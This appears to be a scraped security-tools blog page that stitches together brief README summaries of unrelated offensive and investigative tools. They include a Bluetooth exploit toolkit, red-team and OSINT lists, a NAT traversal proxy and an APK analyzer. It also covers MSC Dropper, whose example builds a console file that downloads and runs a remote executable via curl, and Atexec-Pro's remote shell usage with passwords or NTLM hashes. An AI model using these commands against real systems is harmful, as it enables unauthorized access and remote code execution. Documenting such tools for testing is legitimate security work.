Workflow – Comprehensive Guide To Using BlueToolkit For Bluetooth Vulnerability Testing

The toolkit has several ways it could be used, due to its modular nature, but the main feature of it is to test the Bluetooth Classic enabled device for possible known vulnerabilities.

The modular nature of the toolkit allows a user to test either a specific vulnerability, all of them at once or a specific family of vulnerabilities if the hardware is available.

The vulnerabilities that are present in the arsenal are mainly semi-automated, with an exception for a few, that require manual actions from the user.

This is mainly because it’s not possible or too specific to automate Bluetooth actions of the responding device. Overall the toolkit has the following use cases:

  • Collect reconnaisance information
  • Test 1 exploit
  • Test all exploits
  • Test all exploits but exclude some
  • Test only specific exploits
  • saving and restoring tests from a checkpoint

Typical Workflow

Firstly it’s recommended to collect reconnaissance information from the target device to add additional data for the toolkit as well as run additional analysis. For that run the following commands

  • Put a target device in discoverable mode, alternatively, you can test what kind of information is collected without any interaction from you, when the target device is in discoverable mode and when both a testing and target device a paired.
  • Get a MAC address of the target device. If needed use the following guide LINK_TO_FIND_OUT_MAC_ADDRESS
  • For reconnaissance purposes we need to change the virtual environment
source /usr/share/BlueToolkit/.venv/bin/activate
  • And then run
sudo -E env PATH=$PATH bluekit -t AA:BB:CC:DD:EE:FF -r

For more information click here.

Awesome Red Teaming – A Comprehensive Guide To Advanced Security Techniques

Explore the dynamic world of red teaming with our extensive guide designed for cybersecurity professionals and enthusiasts alike.

‘Awesome Red Teaming’ offers a treasure trove of resources, techniques, and tools that are essential for mastering adversarial tactics and strategies.

This living document is continuously updated to keep pace with the latest in Mitre ATT&CK frameworks and beyond.

List of Awesome Red Team / Red Teaming Resources

This list is for anyone wishing to learn about Red Teaming but do not have a starting point.

Anyway, this is a living resources and will update regularly with latest Adversarial Tactics and Techniques based on Mitre ATT&CK

You can help by sending Pull Requests to add more information.

Table Of Contents

  • Initial Access
  • Execution
  • Persistence
  • Privilege Escalation
  • Defense Evasion
  • Credential Access
  • Discovery
  • Lateral Movement
  • Collection
  • Exfiltration
  • Command and Control
  • Embedded and Peripheral Devices Hacking
  • Misc
  • RedTeam Gadgets
  • Ebooks
  • Training
  • Certification

For more information click here.

Awesome OSINT – A Comprehensive Resource For Cybersecurity Experts

A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources.

In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources).

This list is to help all of those who are into Cyber Threat Intellience (CTI), threat hunting, or OSINT. From beginners to advanced.

Table Of Contents

  • General Search
  • Main National Search Engines
  • Meta Search
  • Specialty Search Engines
  • Visual Search and Clustering Search Engines
  • Similar Sites Search
  • Document and Slides Search
  • File Search
  • Pastebins
  • Code Search
  • Major Social Networks
  • Real-Time Search, Social Media Search, and General Social Media Tools
  • Social Media Tools
    • Twitter
    • Facebook
    • Instagram
    • Pinterest
    • Reddit
    • VKontakte
    • Tumblr
    • LinkedIn
    • Telegram
  • Blog Search
  • Forums and Discussion Boards Search
  • Username Check
  • People Investigations
  • Email Search / Email Check
  • Phone Number Research
  • Vehicle / Automobile Research

For more information click here.

Pwnat : Bridging NAT Barriers Without Port Forwarding

pwnat, by Samy Kamkar, is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with no port forwarding and no DMZ setup on any routers in order to directly communicate with each other.

There is no middle man, no proxy, no third party, no UPnP required, no spoofing, no DNS tricks. The server does not need to know the client’s IP address before connecting.

More importantly, the client can then connect to any host or port on any remote host or to a fixed host and port decided by the server.

Simply put, this is a proxy server that works behind a NAT, even when the client is also behind a NAT.

usage: ./pwnat <-s | -c> <args>

  -c    client mode
        <args>: [local ip] <local port> <proxy host> [proxy port (def:2222)] <remote host> <remote port>

  -s    server mode
        <args>: [local ip] [proxy port (def:2222)] [[allowed host]:[allowed port] ...]

  -6    use IPv6
  -v    show debug output (up to 2)
  -h    show this help and exit

EXAMPLE

Server side allowing anyone to proxy:

./pwnat -s

Client wanting to connect to google.com:80:

./pwnat -c 8000 pwnat.server.com google.com 80

Dor more information click here.

CLI Usage : Command-Line Mastery With The BlueKit Toolkit

Explore the comprehensive command-line interface (CLI) of the BlueKit toolkit designed for cybersecurity professionals.

This article delves into the various CLI commands and options available, providing detailed explanations on how to effectively manage and deploy exploits.

Whether you’re checking system setups or running targeted exploits, this guide equips you with the necessary knowledge to leverage the full potential of BlueKit’s capabilities.

usage: bluekit [-h] [-t TARGET] [-l] [-c] [-ct] [-ch] [-v VERBOSITY] [-ex EXCLUDEEXPLOITS [EXCLUDEEXPLOITS ...]] [-e EXPLOITS [EXPLOITS ...]] [-r] [-re] [-rej] [-hh HARDWARE [HARDWARE ...]] ...

positional arguments:
  rest

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target MAC address
  -l, --listexploits    List exploits or not
  -c, --checksetup      Check whether Braktooth is available and setup
  -ct, --checktarget    Check connectivity and availability of the target
  -ch, --checkpoint     Start from a checkpoint
  -v VERBOSITY, --verbosity VERBOSITY
                        Verbosity level
  -ex EXCLUDEEXPLOITS [EXCLUDEEXPLOITS ...], --excludeexploits EXCLUDEEXPLOITS [EXCLUDEEXPLOITS ...]
                        Exclude exploits, example --exclude exploit1, exploit2
  -e EXPLOITS [EXPLOITS ...], --exploits EXPLOITS [EXPLOITS ...]
                        Scan only for provided --exploits exploit1, exploit2; --exclude is not taken into account
  -r, --recon           Run a recon script
  -re, --report         Create a report for a target device
  -rej, --reportjson    Create a report for a target device
  -hh HARDWARE [HARDWARE ...], --hardware HARDWARE [HARDWARE ...]
                        Scan only for provided exploits based on hardware --hardware hardware1 hardware2; --exclude and --exploit are not taken into account

The toolkit could be used to collect reconnaissance information, run individual exploits, run all automated exploits, run specific exploits or exclude some, check the setup, list all available exploits as well as check target devices for availability and pairability.

The toolkit has checkpoints which could be created during the execution if something goes wrong or a user wants to create one.

Then the checkpoints could be used to continue the workflow from a certain point and finish running the exploits.

To get a taste of how to run them it’s recommended to read (Exploitation workflow examples) to get workflow examples with specific commands and manual actions, and (a description of toolkit parameters) for a description of what each parameter is responsible for.

Python3 Change

Toolkit relies on python3.10 which is installed during the installation process and a default python3 alias is changed to python3.10.

To revert it execute the following command and pick the python3 installation you want:

sudo update-alternatives --config python3

apkInspector – A Comprehensive Tool For APK Analysis And Evasion Detection

apkInspector is a tool designed to provide detailed insights into the zip structure of APK files, offering the capability to extract content and decode the AndroidManifest.xml file.

What sets APKInspector apart is its adherence to the zip specification during APK parsing, eliminating the need for reliance on external libraries.

This independence, allows APKInspector to be highly adaptable, effectively emulating Android’s installation process for APKs that cannot be parsed using standard libraries.

The main goal is to enable users to conduct static analysis on APKs that employ evasion techniques, especially when conventional methods prove ineffective.

Please check this blog post for more details.

How To Install

pip install apkInspector

or you can clone this repository and build and install locally:

git clone https://github.com/erev0s/apkInspector.git
cd apkInspector
poetry build
pip install dist/apkInspector-Version_here.tar.gz

CLI

apkInspector offers a command line tool with the same name, with the following options;

$ apkInspector -h
usage: apkInspector [-h] [-apk APK] [-f FILENAME] [-ll] [-lc] [-la] [-e] [-x] [-xa] [-m] [-sm SPECIFY_MANIFEST] [-a] [-v]

apkInspector is a tool designed to provide detailed insights into the zip structure of APK files, offering the capability to extract
content and decode the AndroidManifest.xml file.

options:
  -h, --help            show this help message and exit
  -apk APK              APK to inspect
  -f FILENAME, --filename FILENAME
                        Filename to provide info for
  -ll, --list-local     List all files by name from local headers
  -lc, --list-central   List all files by name from central directory header
  -la, --list-all       List all files from both central directory and local headers
  -e, --export          Export to JSON. What you list from the other flags, will be exported
  -x, --extract         Attempt to extract the file specified by the -f flag
  -xa, --extract-all    Attempt to extract all files detected in the central directory header
  -m, --manifest        Extract and decode the AndroidManifest.xml
  -sm SPECIFY_MANIFEST, --specify-manifest SPECIFY_MANIFEST
                        Pass an encoded AndroidManifest.xml file to be decoded
  -a, --analyze         Check an APK for static analysis evasion techniques
  -v, --version         Retrieves version information

For more information click here.

WinRM Client Certificate Authentication : Step-By-Step Setup And Configuration Guide

This repo demonstrates how to create certificates for WinRM/WSMan client certificate authentication and how to configure Windows to setup the service side to allow those certificates for client authentication.

It has some Ansible playbooks that can be used to do all the necessary steps plus some standalone scripts and background information to help you understand how certificate authentication works and is configured.

Background

WinRM authentication is typically done through the Negotiate protocol which attempts to use Kerberos authentication before falling back to NTLM.

It is possible to use client certificates through the TLS X.509 client certificate authentication but the documentation around this is hard to come by and hard to understand.

This repo will attempt to show how to both generate those certificates and how to configure the Windows host to use them for authentication.

It will also show how those certificates can be used in Ansible to perform certificate authentication.

Please keep in that certificate authentication does have its downsides such as:

  • it can only be mapped to a local Windows user, no domain accounts
  • the username and password must be mapped to the certificate, if the password changes, the cert will need to be re-mapped
  • an administrator on the Windows host can retrieve the local user password through the certificate mapping
  • the HTTP libraries used by psrp and winrm do not support
    • encrypted private keys, they must be stored without encryption
    • certs and private keys stored as a var, they must be a file

Usually these points are blockers (the last one especially) but if you are still interested then read on.

Requirements

  • Windows host with a HTTPS WinRM listener configured
  • Ansible collections
    • ansible.windows – Used to configured the Windows host
    • community.crypto – Used in setup_certificate.yml
  • Python libraries winrm and psrp for testing the connection

To install the Python libraries we can run:

python3 -m pip install pypsrp winrm

To install the required collections run

ansible-galaxy collection install -r requirements.yml

If you are not using setup_certificate.yml to generate the certificates, then community.crypto will not be needed.

How To Run

Before running we need to add in the inventory details for our Windows host. Edit inventory.ini and add the Windows host hostname/IP under the [windows] section. Also set the ansible_user and ansible_password value under the [windows:vars] section. We can verify that it worked by running ansible -i inventory.ini windows -m ansible.windows.win_ping.

Once the inventory has been setup we run the following playbooks with the CERT_USER set to the Windows user we want to create that’s mapped to the certificate:

CERT_USER=AnsibleCertUser
ansible-playbook -i inventory.ini setup_certificate.yml -e username=$CERT_USER
ansible-playbook -i inventory.ini setup_windows.yml -e username=$CERT_USER

For more information click here.

MSC Dropper – A Python Tool For Custom MSC File Creation And Payload Execution

MSC Dropper is a Python script designed to automate the creation of MSC (Microsoft Management Console) files with customizable payloads for arbitrary execution.

This tool leverages a method discovered by Samir (@SBousseaden) from Elastic Security Labs, termed #GrimResource, which facilitates initial access and evasion through mmc.exe.

Overview

The script allows users to generate MSC files that can execute arbitrary commands or scripts within the Microsoft Management Console environment.

This capability is particularly useful for security research and testing environments.

Features

  • Automated MSC File Generation: Create MSC files with specified commands or scripts embedded.
  • Payload Customization: Customize the payload to execute any command or script that mmc.exe can invoke.
  • Command-Line Interface: Simple command-line interface for quick generation of MSC files.

Installation

Clone the repository:

git clone https://github.com/ZERODETECTION/MSC_Dropper.git

Usage

Generating An MSC File

To generate an MSC file with a specific command or script:

python msc_dropper.py template1.msc out.msc "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"

Replace "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe" with the command or script you want to execute. Ensure that the command is formatted correctly to work within the Windows environment and mmc.exe.

Customizing Payloads

You can customize the payload directly within the template1.msc file or modify the script to automate more complex payload generation.

Atexec-Pro : Advanced Features And Usage For Remote Command Execution

Modified based on atexec.py.

The TSCH service is used by default(need port 135 a dynamic high port), port 445 is no longer required.

ATSVC need port 445

The technology is mainly based on this article by zcgonvh.

Features

  • CMD command execute
  • PS command execute
  • File Upload
  • File Download
  • .Net assembly execute
  • Support ATSVC and TSCH interface.

Note: functions uploaddownload and execute-assembly currently only support files up to 1MB in size. All functions do not bypass AMSI.

Usage

usage: atexec-pro.py [-h] [-i {TSCH,ATSVC}] [-session-id SESSION_ID] [-ts] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address] [-keytab KEYTAB]
                     target

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -i {TSCH,ATSVC}, --interface {TSCH,ATSVC}
                        Interface to use.
  -session-id SESSION_ID
                        an existed logon session to use (no output, no cmd.exe)
  -ts                   adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -codec CODEC          Sets encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with
                        https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found,
                        it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -keytab KEYTAB        Read keys for SPN from keytab file

Example

GetShell

python atexec-pro.py localhost/administrator:123@10.211.55.3

Project Horus – The Comprehensive Toolkit For Investigation Assistance

Project Horus, your ultimate pre-operations tool tailored for enhancing investigation processes.

This comprehensive toolkit leverages advanced APIs and data compilation strategies to streamline your investigative workflow.

Whether you’re a security professional or a tech enthusiast, Horus equips you with the necessary tools to elevate your analytical capabilities.

Table of Contents

  • 🚀 About Horus
  • ⚡ Installation and Usage Instructions
  • ⚙️ API Configuration
  • 🔮 Intended Features
  • 🤝 Current Maintainers
  • 🛠️ Contributing
  • 📧 Contact Me
  • 🤝 Acknowledgements

🚀 About Horus

Horus is an all-in-one encompassing tool for investigations assistance, from API leveraging to compiling data too. Its your pre-ops buddy!

⚡ Installation And Usage Instructions

To get started with this project, you will need Python installed on your device. Once it is installed, follow these steps:

  1. Clone this repository.
  2. cd to the ‘horus’ directory. (Make sure it isn’t the outermost folder)
  3. Install dependencies using the following command: pip install -r requirements.txt
  4. In the ‘horus’ directory, run python3 horus.py on Linux/MacOS, or py horus.py on Windows

Note: protonvpn-cli is a requirement for the ‘pvpn’ command

⚙️ API Configuration

To configure the APIs necessary for usage of certain commands, you can either manually enter them, or use the ‘apicon’ command

To manually configure API keys, navigate to /src/modules/var/pipes/api_config.json. Enter your API keys in their corresponding entries.

⚠️ Warning: If you are contributing to this repository or are testing it through a public fork, make sure to remove your API keys from the JSON file before pushing changes.

🔮 Intended Features

🟢 = Fully implemented or more than 80% done

🟡 = Partially implemented / In development

🔴 = To be implemented

For more information click here.